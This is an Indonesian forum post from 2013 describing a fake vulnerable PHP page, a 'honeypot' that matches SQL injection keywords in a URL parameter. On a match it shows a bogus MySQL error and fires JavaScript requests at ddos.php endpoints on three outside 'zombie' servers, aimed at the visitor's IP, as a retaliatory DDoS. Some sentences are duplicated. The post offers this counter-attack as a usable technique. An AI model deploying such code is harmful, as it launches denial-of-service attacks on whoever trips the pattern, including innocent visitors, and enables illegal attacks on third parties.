05-25-2013, 06:52 PM
nice tutorial om. sebenernya konsepnya sederhana. kita membuat sebuah server palsu (honeypot) dengan keterangan vulnerable boongan juga 
untuk memicu ddos melewati penyamaan pattern perintah bug sqli yang biasanya dipake untuk menyerang. liat kode di bawah ni
ngga asing kan bagi yang sering sqli? nah. apabila terdapat beberapa perintah bug sqli tersebut, maka yang akan dilakukan adalah membuka halaman zombie yang udah terpasang ddos untuk menyerang balik (counter attack) sekalian nampilin bug boongan 
maap neh cuman memperjelas aja buat yang kurang paham ama konsepnya cmiiw
untuk memicu ddos melewati penyamaan pattern perintah bug sqli yang biasanya dipake untuk menyerang. liat kode di bawah niPHP Code:
if (isset($_GET['id']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $_GET['id']))
nah. apabila terdapat beberapa perintah bug sqli tersebut, maka yang akan dilakukan adalah membuka halaman zombie yang udah terpasang ddos untuk menyerang balik (counter attack) sekalian nampilin bug boongan PHP Code:
else {
echo "mysql_fetch_array() expects parameter 1 to /home/namawebanda/public_html/index.php on line 22"; //buat nampilin bug boongan
?>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script>
$.get('http://www.server1.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server2.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
$.get('http://www.server3.com/ddos.php?host=<?=$ip?>', $("form").serialize(), function(e){
});
</script>
<?
}
cuman memperjelas aja buat yang kurang paham ama konsepnya cmiiw